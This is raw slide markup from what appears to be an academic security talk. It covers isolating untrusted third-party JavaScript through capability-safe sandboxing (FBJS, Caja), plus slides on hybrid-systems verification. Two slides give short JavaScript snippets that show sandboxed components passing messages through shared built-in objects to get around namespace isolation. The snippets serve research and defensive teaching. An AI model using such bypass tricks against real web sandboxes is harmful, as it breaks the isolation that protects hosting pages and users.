                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>iOS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06730" y="3530600"/>
              <a:ext cx="2108125" cy="330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iOS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> SDK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06730" y="3200400"/>
              <a:ext cx="579870" cy="33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30730" y="3200400"/>
              <a:ext cx="579870" cy="33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419600" y="3352800"/>
              <a:ext cx="609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39000" y="3354388"/>
              <a:ext cx="609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1447800" y="1147981"/>
            <a:ext cx="1828800" cy="2246531"/>
            <a:chOff x="228600" y="1295400"/>
            <a:chExt cx="1828800" cy="2246531"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5" descr="mitchell-10-smal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295400"/>
              <a:ext cx="1220619" cy="15684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600" y="28956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John C. Mitchell</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(Stanford)</a:t>
              </a:r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3417550" y="1147981"/>
            <a:ext cx="2602250" cy="2170331"/>
            <a:chOff x="2198350" y="1295400"/>
            <a:chExt cx="2602250" cy="2170331"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12" descr="sergio-pho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200" y="1295400"/>
              <a:ext cx="1885950" cy="1524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98350" y="2819400"/>
              <a:ext cx="2602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Sergio </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>Maffeis</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(Imperial College London)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/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6107450" y="3428999"/>
            <a:ext cx="1893550" cy="2286001"/>
            <a:chOff x="4964450" y="1292661"/>
            <a:chExt cx="1893550" cy="2286001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11" descr="jasvi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6200" y="1292661"/>
              <a:ext cx="1380520" cy="163966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64450" y="2932331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Jasvir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>Nagra</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(Google)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/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3810000" y="3429000"/>
            <a:ext cx="1893550" cy="2286000"/>
            <a:chOff x="7162800" y="1179731"/>
            <a:chExt cx="1893550" cy="2286000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="mark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3283" y="1179731"/>
              <a:ext cx="1379717" cy="16396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162800" y="28194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Mark S. Miller</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(Google)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9250" y="3500219"/>
            <a:ext cx="1893550" cy="2214781"/>
            <a:chOff x="7162800" y="3613150"/>
            <a:chExt cx="1893550" cy="2214781"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9" descr="ulfa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3283" y="3613150"/>
              <a:ext cx="1379717" cy="16002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162800" y="51816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Ulfar</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>Erlingsson</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(Google)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04800" y="5715000"/>
            <a:ext cx="8610600" cy="5207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Thank You</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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638800" y="1078468"/>
            <a:ext cx="2602250" cy="1969532"/>
            <a:chOff x="5715000" y="1066800"/>
            <a:chExt cx="2602250" cy="1969532"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="Picture 29" descr="seclab-128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2200" y="1066800"/>
              <a:ext cx="1625600" cy="1625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715000" y="2667000"/>
              <a:ext cx="260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Stanford Security Lab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286000"/>
            <a:ext cx="7315200" cy="18288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Inter-Component Isolation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Inter-Component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laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="19050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022997"/>
            <a:ext cx="2734202" cy="20156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0988" y="3106971"/>
            <a:ext cx="1889412" cy="626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Security-critical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resources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9052" y="3669268"/>
            <a:ext cx="14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Hosting page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43000" y="2166863"/>
            <a:ext cx="746412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82588" y="2166863"/>
            <a:ext cx="746412" cy="500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Bob</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b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 rot="2700000">
            <a:off x="2754389" y="2702458"/>
            <a:ext cx="383703" cy="335166"/>
            <a:chOff x="2506640" y="2138879"/>
            <a:chExt cx="434794" cy="428923"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13" name="Straight Arrow Connector 12"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="8100000" flipV="1">
              <a:off x="2511874" y="2162609"/>
              <a:ext cx="417922" cy="364897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31"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="2700000">
              <a:off x="2509574" y="2135944"/>
              <a:ext cx="428924" cy="434794"/>
              <a:chOff x="-1127214" y="-617790"/>
              <a:chExt cx="1296591" cy="102074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4640000">
                <a:off x="-977743" y="-550259"/>
                <a:ext cx="1020740" cy="88567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 flipV="1">
                <a:off x="-1127214" y="-230558"/>
                <a:ext cx="1296591" cy="183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69"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1981200" y="2248155"/>
            <a:ext cx="625187" cy="342645"/>
            <a:chOff x="2209801" y="1675575"/>
            <a:chExt cx="625187" cy="34264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212005" y="1773691"/>
              <a:ext cx="622982" cy="37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2209801" y="1904998"/>
              <a:ext cx="625187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1940000">
              <a:off x="2310906" y="1711061"/>
              <a:ext cx="399292" cy="269551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9900000" flipV="1">
              <a:off x="2354080" y="1675575"/>
              <a:ext cx="347863" cy="342645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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="18743590">
            <a:off x="1358770" y="2688948"/>
            <a:ext cx="413643" cy="335167"/>
            <a:chOff x="2526845" y="2107997"/>
            <a:chExt cx="440407" cy="428924"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="8100000" flipV="1">
              <a:off x="2526845" y="2200689"/>
              <a:ext cx="417923" cy="32255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1"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="2700000">
              <a:off x="2540482" y="2110133"/>
              <a:ext cx="428890" cy="424667"/>
              <a:chOff x="-1127214" y="-708435"/>
              <a:chExt cx="1296591" cy="99696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556410" flipH="1" flipV="1">
                <a:off x="-941434" y="-213024"/>
                <a:ext cx="996966" cy="614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 flipV="1">
                <a:off x="-1127214" y="-230558"/>
                <a:ext cx="1296591" cy="183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ounded Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="1981200"/>
            <a:ext cx="4648200" cy="320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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: ensure that all sandboxed components: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464"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do not access any security-critical resources belonging to the hosting page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464"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do not write to any heap location that the other component reads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Inter-Component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Does not work!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> – can use built-in objects as communication channels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Alice: 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 $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Alice_o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 = {}; $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Alice_o.toString.ch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 = &lt;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msg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&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>  Bob: 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 $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Bob_o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 = {}; $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Bob_o.toString.ch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;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> 	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50203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FBJS Approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>: Prefix all identifiers in Alice’s code by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>“$Alice_”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and in Bob’s code by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>“$Bob_” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(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namespace separation)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Possible Fix:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> Make all built-in object properties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>readonly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655873"/>
            <a:ext cx="868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Does not work!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> – Can use built-in functions to write to global object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Alice: 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$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Alice_push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 = [].push; $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Alice_push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(&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r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&gt;) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  Bob: 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$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Bob_pop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 = [].pop; $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Bob_pop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2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>...	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5181600"/>
            <a:ext cx="868945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Need a principled approach for reasoning about the set of access privileges held by Alice and Bob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Safe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06651"/>
            <a:ext cx="8686800" cy="39179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Object-Capability languages [Mark Miller et al.]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Capability is a reference to an object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Object reference graph is the access graph</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Examples: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cajita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (JavaScript)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>JoeE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> (Java), Emily (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Ocaml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Enforcing Inter-Component Isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>capabilities determine the set of accessible resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>allocate capabilities so that the set of accessible resources are disjoint </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>intriguing, but not formally rigorous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How do we formalize this idea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5950" y="1219200"/>
            <a:ext cx="868945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Main Idea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</a:rPr>
              <a:t>Every program carries certain capabilities which are the sole means for designating and accessing resources</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 5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2" y="2590800"/>
            <a:ext cx="2078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78050"/>
            <a:ext cx="8763000" cy="4298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Formally defined </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Capability-Safety </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> programming languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Enforcing Inter-Component Isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Formally defined “Authority of a term”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Theorem:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Authority-Isolation =&gt; Inter-Component Isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Identified a capability-safe sublanguage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safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> ⊆ES3 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Developed a sandboxing mechanism for enforcing Authority-Isolation in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safe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Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Caja</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Formalized the core of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Cajita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> subset of JavaScript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Theorem:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> core </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Cajita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> is Capability-Safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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219200"/>
            <a:ext cx="86868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 Capabilities and Isolation of Untrusted Web Applications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[Oakland’10]</a:t>
            </a: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Research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295400"/>
            <a:ext cx="86106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Safety and Stability Verification of  Hybrid Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>(with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Ashish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Tiwari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Sumit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Gulwani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3886200"/>
            <a:ext cx="8610600" cy="20574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Automated Synthesis of Processor Instruction Encodings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>(with Patrice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Godefroid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Research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2590800"/>
            <a:ext cx="86106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Safety and Stability Verification of Hybrid Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>(with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Ashish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Tiwari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Sumit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Gulwani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aptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="1371600"/>
            <a:ext cx="3886200" cy="297939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04672" y="1472184"/>
            <a:ext cx="2445075" cy="1753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Our Approach: Language-Based Sandboxing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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43000" y="1793618"/>
            <a:ext cx="1676400" cy="568582"/>
            <a:chOff x="1168810" y="1793618"/>
            <a:chExt cx="1498190" cy="568582"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1168810" y="1793618"/>
              <a:ext cx="1498190" cy="5685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Sandboxed code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8810" y="1793618"/>
              <a:ext cx="1498190" cy="568582"/>
            </a:xfrm>
            <a:prstGeom prst="rect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981200" y="2409097"/>
            <a:ext cx="762000" cy="486503"/>
            <a:chOff x="1634607" y="2563704"/>
            <a:chExt cx="851726" cy="509411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1634607" y="2611383"/>
              <a:ext cx="651393" cy="436616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769806" y="2563704"/>
              <a:ext cx="716527" cy="509411"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1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prstDash val="dash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52400" y="5070157"/>
            <a:ext cx="701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7472"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What security policies must be enforced?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30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ular Callout 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3487575"/>
            <a:ext cx="3810000" cy="779625"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -723"/>
              <a:gd name="adj2" fmla="val -15720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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Restricted access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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(determined by security policy) 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7620000" y="2971800"/>
            <a:ext cx="15454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Third-party content server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Down Arrow 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3793536" y="2339412"/>
            <a:ext cx="329624" cy="12896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4252" y="2861846"/>
            <a:ext cx="148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Hosting page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Down Arrow 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6273582" y="1422618"/>
            <a:ext cx="330633" cy="12953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5400000">
            <a:off x="3536674" y="1174471"/>
            <a:ext cx="394254" cy="18288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5486400" y="3225224"/>
            <a:ext cx="1371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Hosting page server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Rounded Rectangular Callout 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="990600"/>
            <a:ext cx="3026569" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -11906"/>
              <a:gd name="adj2" fmla="val 742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Statically analyze and rewrite third-party code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9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4062" y="13716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6375400" y="3996788"/>
            <a:ext cx="2616200" cy="2175412"/>
            <a:chOff x="6477000" y="3996788"/>
            <a:chExt cx="2616200" cy="2175412"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Picture 4" descr="adsaf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12000" y="4651375"/>
              <a:ext cx="10890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 descr="facebook-log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12000" y="3996788"/>
              <a:ext cx="14478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 descr="logo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12000" y="5184775"/>
              <a:ext cx="14478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websandbox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7000" y="5816600"/>
              <a:ext cx="2616200" cy="355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4" grpId="0" animBg="1"/>
      <p:bldP spid="39" grpId="0" animBg="1"/>
      <p:bldP spid="40" grpId="0" animBg="1"/>
      <p:bldP spid="5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System: Safety and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1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8354"/>
            <a:ext cx="8915400" cy="27516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Systems with both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>continuous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discrete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dynamics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Multiple modes each with its own continuous dynamics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2714" dirty="0" smtClean="0"/>
              <a:t>specified using a differential equation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2714" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>dx/dt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2714" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2714" i="1" dirty="0" err="1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714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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2714" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>(x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2714" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2714" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2714" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2714" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2714" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
